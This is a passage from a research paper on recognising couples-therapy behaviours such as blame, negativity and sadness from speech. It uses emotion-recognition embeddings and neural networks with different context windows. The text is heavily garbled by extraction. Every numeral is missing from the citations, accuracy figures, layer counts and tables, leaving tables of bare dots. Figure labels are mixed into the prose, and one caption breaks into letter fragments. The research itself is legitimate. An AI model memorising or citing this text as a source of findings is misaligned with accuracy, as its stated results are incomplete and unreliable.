(gupta et al., ; nasir et al., ; stasak et al., ; tanaka, yamamoto & haruno, ) and suicide risk assessment (cummins et al., ; venek et al., ; nasir et al., ; nasir et al., a), behavior analysis systems help psychologists observe and evaluate domain-specific behaviors during interactions. li, baucom & georgiou ( ) proposed sparsely connected and disjointly trained deep neural networks to deal with the low-resource data issue in behavior understanding. unsupervised (li, baucom & georgiou, ) and out-of-domain transfer learning (tseng, baucom & georgiou, ) have also been employed on behavior understanding tasks. despite these important and encouraging steps towards behavior quantification, obstacles still remain. due to the end-to-end nature of recent efforts, low- resource data becomes a dominant limitation (li, baucom & georgiou, ; collobert et al., ; soltau, liao & sak, ; heyman et al., ). this is exacerbated in bsp scenario by the difficulty of obtaining data due to privacy constraints (lustgarten, ; narayanan & georgiou, ). challenges with subjectivity and low interannotator agreement (busso & narayanan, ; tseng et al., ), especially in micro and macro annotation complicate the learning task. further, and importantly such end-to-end systems reduce interpretability generalizability and domain transfer (sculley et al., ). linking emotion and behavior quantification as mentioned before, domain experts employ information within the context of the interaction at varying timescales to estimate the behaviors of interest (narayanan & georgiou, ; tseng et al., ). specific short-term affect, e.g., certain basic emotions, can be indicators of some complex long-term behaviors during manual annotation process (heavey, gill & christensen, ; jones & christensen, ; heyman, ). these vary according to the behavior; for example, negativity is often associated with localized cues (carney, colvin & hall, ), demand and withdrawal require more context (heavey, christensen & malamuth, ), and coercion requires a much longer context beyond a single interaction (feinberg, kan & hetherington, ). chakravarthula et al. ( ) analyzed behaviors, such as ‘‘anger’’ and ‘‘satisfaction’’, and found that negative behaviors could be quantified using short observation length whereas positive and problem solving behaviors required much longer observation. in addition, baumeister et al. ( ) and baumeister et al. ( ) discussed two kinds of theories: the direct causality model and inner feedback model. both models emphasize the existence of a relationship between basic emotion and complex behavior. literature from psychology (dunlop, wakefield & kashima, ; burum & goldfried, ) and social li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. science (spector & fox, ) also showed that emotion can have impacts and further shape certain complex human behaviors. to connect basic emotion with more complex affective states, carrillo et al. ( ) identified a relationship between emotional intensity and mood through lexical modality. khorram et al. ( ) verified the significant correlation between predicted emotion and mood state for individuals with bipolar disorder on acoustic modality. all these indicate that the aggregation and link between basic emotions and complex behaviors is of interest and should be examined. proposed work: behavioral primitives our work consists of three studies for estimation of behavior through emotion information as follows: . context-dependent behavior from emotion labels: basic emotion affect labels are directly used to predict long-term behavior labels through a recurrent neural network. this model is used to investigate whether the basic emotion states can be sufficient to infer behaviors. . context-dependent behavior from emotion-informed embeddings: instead of directly using the basic emotion affect labels, we utilize emotion-informed embeddings towards the prediction of behaviors. . reduced context-dependent behavior from emotion-informed embeddings: similar to ( ) above, we employ emotion-informed embeddings. in this case, however, we investigate the importance of context, by progressively reducing the context provided to the neural network in predicting behavior. for all three methods, we utilize a hybrid model of convolution and recurrent neural networks that we will describe in more detail below. through our work, both emotion labels and emotionally informed embeddings will be regarded as a type of behavior primitive, that we call basic affect behavioral primitive information (or behavioral primitives for short, bp). an important step in obtaining the above bp is the underlying emotion recognition system. we thus first propose and train a robust multi-emotion regression network (er) using convolutional neural network (cnn), which is described in detail in the following subsection. emotion recognition in order to extract emotionally informed embeddings and labels, we propose a cnn based multi-emotion regression network (er). the er model has a similar architecture as (aldeneh & provost, ), except that we use one-dimensional ( d) cnn kernels and train the network through a regression task. the cnn kernel filter should include entire spectrum information per scan, and shift along the temporal axis, which performs better than other kernel structures according to huang & narayanan ( a). our model has three components: ( ) stacked d convolutional layers; ( ) an adaptive max pooling layer; ( ) stacked dense layers. the input acoustic features are first processed by multiple stacked d convolution layers. filters with different weights are employed to extract different information from the same input sample. then, one adaptive max pooling li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. layer is employed to further propagate d cnn outputs with the largest value. this is further processed through dense layers to generate the emotional ratings at short-term segment level. the adaptive max pooling layer over time is one of the key components of this and all following models: first, it can cope with variable length signals and produce fixed size embeddings for subsequent dense layers; second, it only returns the maximum feature within the sample to ensure only the more relevant emotionally salient information is propagated through training. we train this model as one regression model which predicts the annotation ratings of all emotions jointly. analogous to the continuous emotion representation model (schlosberg, ), this multi-emotion joint training framework can utilize strong bonds but blurred boundaries within emotions to learn the embeddings. through this joint training process, the model can integrate the relationship across different emotions, and hopefully obtain an affective-rich embedding. in addition, to evaluate the performance of proposed er , we also build multiple binary, single-emotion, classification models (single-emotion classification network (ec)). the ec model is modified based on pre-trained er by replacing the last linear layer with new fully connected layers to classify each single emotion independently. during training, the back propagation only updates the newly added linear layers without changing the weights of pre-trained er model. in this case, the loss from different emotions is not entangled and the weights will be optimized towards each emotion separately. more details of experiments and results comparison are described in ‘experiments and results discussion’. as mentioned before, we employ two kinds of behavioral primitives in order to investigate the relationship between emotions and behaviors, and the selection of these two kinds of bp arises through the discrete, ec, and continuous, er, emotion representation models. the two kinds of bp are: ( ) the discrete vector representation of predicted emotion labels, denoted as b-bp_k, from the single-emotion classification network (ec), where k means kth basic emotion; and ( ) the output embeddings of the cnn layers, denoted as e-bp_ l, from the multi-emotion regression network system (er), where l represents the output from lth cnn layer. all these are illustrated in fig. . behavior recognition through emotion-based behavior primitives we now describe three architectures for estimating behavior through basic affect behavioral primitive information (or behavioral primitives for short, bp). the three methods employ full context of the emotion labels from the single-emotion classification network (ec), the full context from the embeddings of the multi-emotion regression network (er) system, and increasingly reduced context from the multi-emotion regression network system (er). context-dependent behavior recognition from emotion labels in this approach, the binarized predicted labels from the ec system are employed to predict long-term behaviors via sequential models in order to investigate relationships between emotions and behaviors. such a design can inform the degree to which short-term emotion can influence behaviors. it can also provide some interpretability of the employed li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. binarized emotion-vector behavior primitives (b-bp) b-bp_ acoustic features d cnn d cnn d cnn l* d cnn l/ * l/ * l/ * l/ * * emotion ratings emotion binary label input from er e-bp_ e-bp_ e-bp_ . . . e-bp_ er multi-emotion regression network (er) behavior primitives single-emotion classification network (ec) fc fc fc fc fully connected layer (fc) fc fc b-bp_ b-bp_ . . . max pooling emotion embedding behavior primitives (e-bp) single emotion classifiers figure models of er, ec and two kinds of bps. l is the input feature length. full-size doi: . /peerjcs. /fig- information for decision making, over end-to-end systems that generate predictions directly from the audio features. we utilize the single-emotion classification network (ec) described in the previous section to obtain the predicted binarized emotion-vector behavior primitives (b-bp) on shorter speech segment windows as behavioral primitives. these are extracted from the longer signals that describe the behavioral corpus and are utilized, preserving sequence, hence context, within a recurrent neural network for predicting the behavior labels. figure illustrates the network architecture and b-bp_* means the concatenation of all b-bp_k, where k ranges from to . in short, the b-bp vectors are fed into a stack of gated recurrent units (grus), followed by a densely connected layer which maps the last hidden state of the top recurrent layer to behavior label outputs. grus were introduced in chung et al. ( ) as one attempt to alleviate the issue of vanishing gradient in standard vanilla recurrent neural networks and to reduce the number of parameters over long short-term memory (lstm) neurons. grus have a linear shortcut through timesteps which avoids the decay and thus promotes gradient flow. in this model, only the sequential gru components and subsequent dense layers are trainable, while the ec networks remain fixed. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. segment segment segment segment… ec ec ec ec gru gru gru gru speech pretrained… … trainable behaviorsfc layers b-bp_* b-bp_* b-bp_* b-bp_* figure b-bp based context-dependent behavior recognition model. full-size doi: . /peerjcs. /fig- … speech … behaviorsfc layers max pooling e-bp_ cnn cnn cnn cnn emotion regression system (green box, figure ) frozen layers e-bp_ cnn cnn e-bp_ cnn cnn gru segment embedding e-bp_l adapted layers . . . gru segment embedding e-bp_l gru segment embedding e-bp_l cnn cnn cnn cnn figure e-bp based context-dependent behavior recognition model. e-bp_ l is the output from lth pretrained cnn layer. in practice multiple e-bp_ l can be employed at the same time through concatena- tion. in this work we only employ the output of a single layer at a time. full-size doi: . /peerjcs. /fig- context-dependent behavior recognition from emotion-embeddings it is widely understood that information closer to the output layer is more tied to the output labels while closer to the input layer information is less constrained and contains more information about the input signals. in our er network, the closer we are to the output, the more raw information included in the signal is removed and the more we are constrained to the basic emotions. given that we are not directly interested in the emotion labels, but in employing such relevant information for behavior, it makes sense to employ layers below the last output layer to capture more behavior-relevant information closer to its raw form. thus, instead of using the binary values representing the absence or existence of the basic emotions, we can instead employ emotion-embedding behavior primitives (e-ebp) as the input representation. the structure of the system is illustrated in fig. . after pretraining the er , we keep some layers of that system fixed, and employ their embeddings as the emotion-embedding behavior primitives. we will discuss the number of fixed layers in the experiments section. this e-bp serves as the input of the subsequent, trainable, convolutional and recurrent networks. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. s eech a di e e ce c e a a e i hi he l cal i d c e ed ced gl ball e-bp figure illustration of local context awareness and global context reduction. in previous sections, the e-bps (and b-bps) are passed to a gru that preserves their sequences. here they are processed through pooling and context is removed. full-size doi: . /peerjcs. /fig- the overall system is trained to predict the longer-term behavior states. by varying the number of layers that remain unchanged in the er system and using different embeddings from different layers for the behavior recognition task we can identify the best embeddings under the same overall number of parameters and network architecture. the motivation of the above is that the fixed er encoding module is focusing on learning emotional affect information, which can be related but not directly linked with behaviors. by not using the final layer, we are employing a more raw form of the emotion-related information, without extreme information reduction, that allows for more flexibility in learning by the subsequent behavior recognition network. this allows for transfer learning (torrey & shavlik, ) from one domain (emotions) to another related domain (behaviors). thus, this model investigates the possibility of using transfer learning by employing emotional information as ‘‘building blocks’’ to describe behavior. reduced context-dependent behavior recognition from emotion-informed embeddings in the above work, we assume that the sequence of the behavior indicators (embeddings or emotions) is important. to verify the need for such an assumption, in this section, we propose varying the degree of employed context. through quantification, we analyze the time-scales at which the amount of sequential context affects the estimation of the underlying behavioral states. in this proposed model, we design a network that can only preserve local context. the overall order of the embeddings extracted from the different local segments is purposefully ignored so we can better identify the impact of de-contextualizing information as shown in fig. . in practice, this reduced-context model is built upon the existing cnn layers as in the e-bp case. we will create this reduced context system by employing only the e-bp li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. speech behaviors smaller receptive field cnn cnn cnns cnn pretrained … … fc fc speech behaviors larger receptive field cnn cnn cnns cnn pretrained … … fc fc local avg pooling local avg pooling e-bp_optimal max pooling max pooling e-bp_optimal a b figure e-bp reduced context-dependent behavior recognition model. model (a) has a smaller recep- tive field while model (b) has a larger receptive field because of the added local average pooling layers. full-size doi: . /peerjcs. /fig- embeddings. the e-bp embeddings are extracted from the same emotion system as before. in this case, however, instead of being fed to a recursive layer with full-session view, we eliminate the recursive layer and incorporate a variable number of cnn layers and local average pooling functions in between to adjust context view. since the final max-pooling layer ignores the order of the input, the largest context is determined by the receptive field view of the last layer before this max-pooling. we can thus investigate the impact of context by varying the length of the cnn receptive field. figure illustrates the model architecture. we extract the optimal e-bp based on the results of previous model, and then employ more cnn layers with different receptive field sizes to extract high-dimensional representation embeddings, and finally input them to the adaptive max-pooling along the time axis to eliminate the sequential information. within each cnn receptive field, shown as red triangles in the figure, the model still has access to the full receptive field context. the max pooling layer removes context across the different receptive windows. furthermore, the receptive field can be large enough to enable the model to capture behavioral information encoded over longer timescales. in contrast a very small receptive area, e.g., at timescale of phoneme or word, sensing behaviors should be extremely difficult (baumeister et al., ) and can even be challenging to detect emotions (mower & narayanan, ). the size of the receptive field is decided by the number of cnn layers, li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. corresponding stride size, and the number of local average pooling layers in between. in our model, we adjust the size of the receptive field by setting different number of local average pooling layers under which the overall number of network parameters is unchanged. datasets emotion dataset: cmu-mosei dataset the cmu multimodal opinion sentiment and emotion intensity (cmu-mosei) (zadeh et al., ) contains video files carefully chosen from youtube. each sample is a monologue with verified quality video and transcript. this database includes distinct speakers with kinds of topics, and are gender balanced with an average length of . seconds. speech segments are already filtered during the data collection process, thus all speech segments are monologues of verified audio quality. for each speech segment, six emotions (happiness, sadness, anger, fear, disgust, surprise) are annotated on a [ , ] likert scale for the presence of each emotion. ( : no evidence; : weak evidence; : evidence; and : high evidence of emotion). this, after averaging ratings from annotators, results in a -dimensional emotional rating vector per speech segment. cmu-mosei ratings can also be binarized for each emotion: if a rating is greater than it is considered that there is some presence of emotion, hence it is given a true presence label, while a zero results in a false presence of the emotion. the original dataset has , speech segments and each speech segment may contain more than one emotion presence label. through our experiments, we use the segments with available emotion annotations and standard speaker independent split from dataset sdk (zadeh, ): overall we have true presence in , segments for happiness, , for sadness, , for anger, , for surprise, , for disgust and , for fear. due to the imbalance, accurate estimation of some emotions will be challenging. the training set consists of , speech segments, while the validation set and test set consist of , and , sentences respectively. behavior dataset: couples therapy corpus the couples therapy dataset is employed to evaluate complex human behaviors. the corpus was collected by researchers from the university of california, los angeles and the university of washington for the couple therapy research project (christensen et al., ). it includes a longitudinal study of years of real distressed couples. each couple has been recorded at multiple instances over the years. at the beginning of each session, a relationship-related topic (e.g., ‘‘why can’t you leave my stuff alone?’’) was selected and the couple interacted about this topic for minutes. each participant’s behaviors were rated by multiple well-trained human annotators based on the couples interaction (heavey, gill & christensen, ) and social support interaction (jones & christensen, ) rating systems. behavioral codes were rated on a likert scale of to , where refers absence of the given behavior and indicates a strong presence. most of the sessions have to annotators, and annotator ratings were averaged to obtain the final -dimensional behavioral rating vector. the employed part of the dataset includes coded sessions, totaling . h of data across unique couples. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. audio processing and feature extraction behavioral dataset pre-processing for preprocessing the couples therapy corpus we employ the procedure described in (black et al., ). the main steps are speech activity detection (sad) and diarization. since we only focus on acoustic features extracted for speech regions, we extract the speech parts using the sad system described in ghosh, tsiartas & narayanan ( ), and only keep sessions with an average snr greater than db ( . % of original dataset). since labels of behavior are provided per-speaker, accurate diarization is important in this task. thus, for diarization we employ the manually-transcribed sessions and a forced aligner in order to achieve high quality interlocutor-to-audio alignment. this is done using the recursive asr-based procedure of alignment of the transcripts with audio by sailalign (katsamanis et al., ). speech segments from each session for the same speaker are then used to analyze behaviors. during testing phase, a leave-test-couples-out process is employed to ensure separation of speaker, dyad, and interaction topics. more details of the preprocessing steps can be found in (black et al., ). after the processing procedure above, the resulting corpus has a total of . h of audio data across unique couples and a total of sessions. feature extraction in this work, we focus only on the acoustic features of speech. we utilize log-mel filterbank energies (log-mfbs) and mfccs as spectrogram features. further, we employ pitch and energy. these have been shown in past work to be the most important features in emotion and behavior related tasks. these features are extracted using kaldi (povey et al., ) toolkit with a ms analysis window and a window shift of ms. the number of mel-frequency filterbanks and mfccs are both set to . for pitch, we use the extraction method in ghahremani et al. ( ), in which features, normalized cross correlation function (nccf), pitch (f ), the delta of pitch, are included for each frame. after feature extraction, we obtain an -dimensional feature per frame ( log-mfb’s, mfcc’s, energy, f , delta of f , and ncff). experiments and results discussion general settings for emotion-related tasks, we utilize the cmu-mosei dataset with the given standard train, validation, test data split from zadeh ( ). for the behavior related tasks, we employ the couple therapy corpus and use leave- - couples-out cross-validation. note that this results in distinct neural-network training- evaluation cycles for each experiment. during each fold training, we randomly split couples out as a validation dataset to guide the selection of the best trained model and prevent overfitting. all these settings ensure that the behavior model is speaker independent and will not be biased by speaker characteristics or recording and channel conditions. in our experiments, we employ five behavioral codes: acceptance, blame, positivity, negativity and sadness, each describing a single interlocutor in each interaction of the li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. full definitions are too long to insert in this manuscript and reader is encouraged to look into (heavey, gill & christensen, ; jones & christensen, ) table description of behaviors. behavior description acceptance indicates understanding, acceptance, respect for partner’s views, feelings and behaviors blame blames, accuses, criticizes partner and uses critical sarcasm and character assassinations positivity overtly expresses warmth, support, acceptance, affection, positive negotiation negativity overtly expresses rejection, defensiveness, blaming, and anger sadness cries, sighs, speaks in a soft or low tone, expresses unhappiness and disappointment couples therapy corpus. table lists a brief description of these behaviors from the annotation manuals (heavey, gill & christensen, ; jones & christensen, ). following the same setting of (black et al., ) to reduce effects of interannotator disagreement, we model the task as a binary classification task of low- and high- presence of each behavior. this also enables balancing for each behavior resulting in equal-sized classes. this is especially useful as some of the classes, e.g., sadness, have an extremely skewed distribution towards low ratings. more information on the distribution of the data and impact on classification can be found in (georgiou et al., ). thus, for each behavior code and each gender, we filter out sessions on one extreme of the code (e.g., high blame) and sessions at the other extreme (e.g., low blame). since due to the data cleaning process, some sessions may be missing some of the behavior codes, we use a mask and train only for the available behaviors. moreover, the models are trained to predict the binary behavior labels for all behaviors together. the loss is calculated by averaging behavioral classification loss with masked labels. thus, this loss is not optimizing for any specific behavior but it is focusing on the general, latent, link between emotions and behaviors. er and ec for emotion recognition both the multi-emotion regression network (er) and the single-emotion classification network (ec) are trained using the cmu-mosei dataset. the multi-emotion regression network (er) system consists of layers of d cnn layers, adaptive max-pooling layer and followed by fully connected layers with relu activation function. during the training, we randomly choose a segment from each utterance and represent the label of the segment using the utterance label. in our work, we employ a segment length of s. the model is trained jointly with all six emotions by optimizing the mean square error (mse) regression loss for all emotions ratings together using adam optimizer (kingma & ba, ). in a stand-alone emotion regression task, a separate network that can optimize per- emotion may be needed (through higher-level disconnected network branches), however in our work, as hypothesized above, this is not necessary. our goal is to extract as much li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table weighted classification accuracy (wa) in percentage for emotion recognition on the cmu- mosei dataset. bold numbers represent the best performing system. emotions anger disgust fear happy sad surprise methods in cmu-mosei zadeh et al. ( ) . . . . . . proposed ec . . . . . . information as possible from the signal relating to any and all available emotions. we will, however, investigate optimizing per emotion in the ec case. further to the er system, we can optimize per emotion through the single-emotion classification network (ec). this is trained for each emotion separately by replacing the pre-trained er ’s last linear layer with three emotion-specific fully connected layers. we use the same binary labeling setting as described in zadeh et al. ( ): within each emotion, for samples with original rating value larger than zero, we assign the label by considering the presence of that emotion; for samples with rating , we assign label . during training, we randomly choose -second segments as before. during evaluation, we segment each utterance into one-second segments and the final utterance emotion label is obtained via majority voting. in addition, the cmu-mosei dataset has a significant data imbalance issue: the true label in each emotion is highly under-represented. to alleviate this, during training, we balance the two classes by subsampling the label esence class in every batch. in our experiments, in order to correctly classify most of the relevant samples, the model is optimized and selected based on average weighted accuracy (wa) as used in zadeh et al. ( ). wa is defined in tong et al. ( ): weighted accuracy = (tp×n /p+tn)/ n , where tp (resp. tn) is true positive (resp. true negative) predictions, and p (resp. n) is the total number of positive (resp. negative) examples. as shown in table , we present wa of each ec system and compare them with the state-of-art results from zadeh et al. ( ). compared with zadeh et al. ( ), our proposed d cnn based emotion recognition system achieves comparable results and thus the predicted binary emotion labels can be considered satisfactory for further experiments. more importantly, our results indicate that the pre-trained er embedding captures sufficient emotion related information and can thus be employed as a behavior primitive. context-dependent behavior recognition the main purpose of the experiments in this subsection is to verify the relationship between emotion-related primitives and behavioral constructs. we employ both b-bp and e-bp as described below. before that, we first use examples to illustrate the importance of context information in behavior understanding. importance of context information in behavior understanding prior to presenting the behavior classification results, we use two sessions from couple therapy corpus to illustrate the importance of context information in behavior understanding. once the single-emotion classification network (ec) systems are trained, a sequence of emotion label vectors can be generated by applying the ec systems on each li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. anger disgust fear happy sad surprise emotion . . . . . . . . . p er ce nt ag e of s eg m en ts w ith e m ot io n p re se nc e negativity label negativity label a ng er d is gu st fe ar h ap py s ad time/(s) s ur pr is e g a b c d e f figure sessions with similar percentage of emotions presence but different behavior label. full-size doi: . /peerjcs. /fig- speech session. we choose two sessions and plot those sequences of emotion presence vectors of the first seconds as an example in fig. , in which each dot represents the emotion presence (i.e., predicted label equals to ) at the corresponding time. for each emotion, the percentage of emotion presence segments is calculated by dividing the number of emotion presence segments by the total number of segments. these two sessions are selected as an example since they have similar audio stream length and percentage of emotion presence segments but different behavior labels: the red represents one session with ‘‘strong presence of negativity’’ while blue represents another session with ‘‘absence of negativity’’. this example reveals the fact that, as we expected, the behaviors are determined not only by the percentage of affective constructs but also the contextual information. as shown in the left (figs. a– f), the emotion presence vectors exhibit different sequential patterns within two sessions, even though no significant distribution difference can be observed in fig. g. b-bp based context-dependent behavior recognition binarized emotion-vector behavior primitives are generated by applying the single- emotion classification network (ec) systems on the couple therapy data: for each session, a sequence of emotion label vectors is generated as e =[e ,e ,...,et], where each element ei is the dimensional b-bp binary label vector at time i. that means that eij represents the presence, through a binary label or , of emotion j at time i. such b-bp are the input of the context-dependent behavior recognition model that has two layers of grus followed by two linear layers as illustrated in fig. . as shown in table , the average binary classification accuracy of these five behaviors is . %. considering that the classification accuracy can reach up to % by chance li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. which isn’t necessarily perfectly aligning with the basic emotion ‘‘sad’’ but follows the ssirs manual. table behavior binary classification accuracy in percentage for context-dependent behavior recog- nition model from emotion labels. average acceptance blame positivity negativity sadness . . . . . . with balanced data, our results show that behavioral states can be weakly inferred from the emotion label vector sequences. further, we perform the mcnemar test, and the results above and throughout the paper are statistically significant with p < . . despite the low accuracy of the behavior positivity, these results suggest a relationship between emotions and behaviors that we investigate further below. e-bp based context-dependent behavior recognition the simple binary emotion vectors (as b-bp) indeed link emotions and behaviors. however, they also demonstrate that the binarized form of b-bp limits the provided information bandwidth to higher layers in the network, and as such limits the ability to predict the much more complex behaviors. these are reflected in the low accuracies in table . this further motivates the use of the emotion-embedding behavior primitives. as described in fig. , we construct input of the e-bp context-dependent behavior recognition system using the pretrained multi-emotion regression network (er). these e-bp embeddings capture more information than just the binary emotion labels. they potentially capture a higher abstraction of emotional content, richer paralinguistic information, conveyed through a non-binarized version that doesn’t limit the information bandwidth, and may further capture other information such as speaker characteristics or even channel information. we employ embeddings from different layers of the er network. the layers before the employed embedding are in each case frozen and only the subsequent layers are trained as denoted in fig. . the trainable part of the network includes several cnn layers with max pooling and subsequent gru networks. the gru part of the network is identical to the ones used by the context-dependent behavior recognition from e-bp. the use of different depth embeddings can help identify where information loss becomes too specific to the er loss objective versus where there is too much unrelated information to the behavior task. in table , the none-e-bp model, as the baseline, means all parameters are trained from random initialization instead of using the pretrained e-bp input. while e-bp_ l model means the first l layers of the pretrained er network are fixed and their output is used as the embedding e-bp for the subsequent system. as seen in the second column of the table, all of e-bp based models perform significantly better than the b-bp based model, which achieves an improvement of . % on average and up to . % for negativity. these results, further support the use of basic emotions as constructs of behavior. in general, for all behaviors, the higher-level e-bp s, which are closer to the er loss function, can capture affective information and obtain better performance in behavior quantification compared with lower-level embeddings. from the description in table , some behaviors are closely related to emotions. for example, negativity is defined in part as ‘‘overtly expresses rejection, defensiveness, blaming, and anger’’, and sadness is defined in part as li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. , samples from commit: https://github.com/a zadeh/ cmu-multimodalsdk/commit/ f f df c d fd cc . table behavior binary classification accuracy in percentage for context-dependent behavior recog- nition model from emotion-embeddings. bold numbers represent the best performing system. average acceptance blame positivity negativity sadness none-e-bp model (baseline) . . . . . . e-bp_ model . . . . . . e-bp_ model . . . . . . e-bp_ model . . . . . . e-bp_ model . . . . . . ‘‘expresses unhappiness and disappointment’’. this shows that these behaviors are very related to emotions such as anger and sad, thus it’s expected that an embedding closer to the er loss function will behave better. note that these are not at all the same though: a negative behavior may mean that somewhere within the min interaction or through unlocalized gestalt information the expert annotators perceived negativity; in contrast a negative emotion has short-term information (on average s segment) that is negative. an interesting experiment is what happens if we use a lower-ratio of emotion (out-of- domain) vs. behavior (couples-in-domain) data. to perform this experiment we use only half of the cmu-mosei data to train another er system, and use this less robust er system and corresponding e-bp representations to reproduce the behavior quantification as in table . what we observe is that the reduced learning taking place on emotional data requires the in-domain system to have prefer embeddings closer to the feature. specifically negativity performs equally well with layers or at . %. positivity performs best with layer at . %, blame and acceptance perform best with layer at . % and . % respectively while sadness performs best through layer at . %. in the reduced data case we observe that best performing layer is not consistently layer . employing the full dataset as in table provides better performance than using less data and in that case layer (e-bp_ ) is always the best performing layer, thus showing that more emotion data provides better ability of transfer learning. reduced context-dependent behavior recognition in the previous two sections we demonstrate that there is a benefit to transfer emotion- related knowledge to behavior tasks. we show that the wider bandwidth information transfer through an embedding e-bp is beneficial to a binarized b-bp representation. we also show that depending on the degree of relationship of the desired behavior to the signal or to the basic emotion, different layers that are closer to the input signal or closer to the output loss, may be more or less appropriate. however, in all the above cases we assume that the sequence and contextualization of the extracted emotion information was needed. that is captured and encoded through the recursive gru layers. we conduct an alternative investigation into how much contextual information is needed. as discussed in section reduced context-dependent behavior recognition from emotion-informed embeddings and shown on fig. we can reduce context through changing the receptive field of our network prior to removing sequential information via max pooling. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/a zadeh/cmu-multimodalsdk/commit/f f df c d fd cc https://github.com/a zadeh/cmu-multimodalsdk/commit/f f df c d fd cc https://github.com/a zadeh/cmu-multimodalsdk/commit/f f df c d fd cc https://peerj.com http://dx.doi.org/ . /peerj-cs. table behavior binary classification accuracy in percentage for reduced context-dependent behavior recognition from emotion-informed embeddings. bold numbers represent the best performing system. average acceptance blame positivity negativity sadness receptive_field_ s . . . . . . receptive_field_ s . . . . . . receptive_field_ s . . . . . . receptive_field_ s . . . . . . receptive_field_ s . . . . . . in this section we select the best e-bp based on average results in table , i.e., e-bp- , as the input of the reduced context-dependent behavior recognition model. based on e-bp- embeddings, the reduced context-dependent model employs more cnn layers with optional local average pooling layers in between, and is followed by an adaptive max pooling layer and three fully connected layers to predict the session level label directly without sequential modules. since the number of parameters of this model is largely increased, dropout (srivastava et al., ) layers are also utilized to prevent overfitting. local average pooling layers with kernel size and stride are optionally added between newly added cnn layers to adjust the final size of the receptive field: the more average pooling layers we use, the larger temporal receptive field can be obtained for the same number of network parameters. we endure that the overall number of trainable parameters is the same for the different receptive field settings, which provides a fair comparison of the resulting systems. the output of these cnn/local pooling layers is passed to an adaptive max pooling before the fully connected layers as in fig. . in table , each model has a different temporal receptive window ranging from seconds to min. for most behaviors, we observe a better classification as the receptive field size increases, especially in the range from seconds to s, demonstrating a need for longer observations for behaviors. furthermore, the results suggest different behaviors require different observation window length to be quantified, which is also observed by chakravarthula et al. ( ) using lexical analysis. by comparing results with different receptive window sizes, we can indirectly obtain the appropriate behavior analysis window size for each behavior code. as shown in table , sadness has a smaller optimal receptive field size than behaviors such as acceptance, positivity and blame. this is in good agreement with the behavior descriptions. for example, behaviors of acceptance, positivity and blame often require relatively longer observations since they relate to understanding and respect for partner’s views, positive negotiation, and accusation respectively, which often require multiple turns in a dialog and context to be captured. on the other hand, sadness which can be expressed via emitting a long, deep, audible breath, and is also related to short-term expression of unhappy affect, can be captured with shorter windows. moreover, we find the classification of negativity reaches high accuracy when using a large receptive field. this might be contributed by the fact that the negative behavior in the couple therapy domain is complex, which is not only revealed by short term negative li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note that this does not make any claims on interlocutor dynamics, talk time, turn- taking etc., but just single person acoustics. affect but also related to context based negotiation and hostility, and is captured through gestalt perception of the interaction. in addition, the conclusion that most of the behaviors do not benefit much from longer than s windows matched existing literature on thin slices (ambady & rosenthal, ), which refer to excerpts of an interaction that can be used to arrive at a similar judgment of behavior to as if the entire interaction had been used. analysis on behavior prediction uncertainty reduction besides the verification of the improvement from b-bp based model to e-bp based models, in this section, we further analyze the importance of context information for each behavior by comparing results between e-bp based context-dependent and reduced context-dependent models. this analysis calls into question that which behavior is more context involved and to what degree. classification accuracy is used as the evaluation criterion in previous experiments. more generally, this number can be regarded as a probability of correct classification when a new session comes to measure. inspired by entropy from information theory, we define one metric named prediction uncertainty reduction (pur) and use it to indicate the relative behavior prediction and interpretation improvement among different models for each behavior. suppose pm(x)∈[ , ] is the probability of correct classification for behavior x with model m. we define the uncertainty of behavior prediction as: im(x)=−pm(x)log (pm(x))−( −pm(x))log ( −pm(x)) if pm(x) is equal to , im(x)= there is no improvement possibility; if pm(x) is equal to . , same as random prediction accuracy, the uncertainty is the largest. we further define the prediction uncertainty reduction (pur) value of behavior x from model m to model n as: rm→n(x)= im(x)−in(x). we use this value to indicate improvements between different models. we use pur to sense the relative improvement from e-bp based context-dependent and e-bp based reduced context-dependent models respectively, to the baseline b-bp based context-dependent model. the larger value of pur suggests the clear improvement of behavior prediction. for each behavior, for each e-bp based model, we choose the best performance model (the bold number from tables and ) to calculate pur value from baseline b-bp context-dependent model. in fig. , as expected, for most behaviors the positive pur values verify the improvement from using informative e-bp to simple binary b-bp. in addition, the results support the hypothesis that the sequential order of affective states is one non-negligible factor of behavior analysis since the pru of context-dependent (blue color) model is better than that of reduced context one (red color) for most behaviors. more interestingly, for each behavior, the difference between two bars (i.e., pur difference) can imply the necessity and importance of the sequential and contextual factor of quantifying that behavior. we notice that for ‘‘positive’’ or more ‘‘complex problem li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. average acceptance blame positivity negativity sadness behavior . . . . p re d ic tio n u n ce rt a in ty r e d u ct io n v a lu e e-bp based context-dependent e-bp based reduced context-dependent figure pur optimal value of e-bp based context-dependent and reduced context-dependent mod- els across behaviors. full-size doi: . /peerjcs. /fig- solving’’ related behaviors 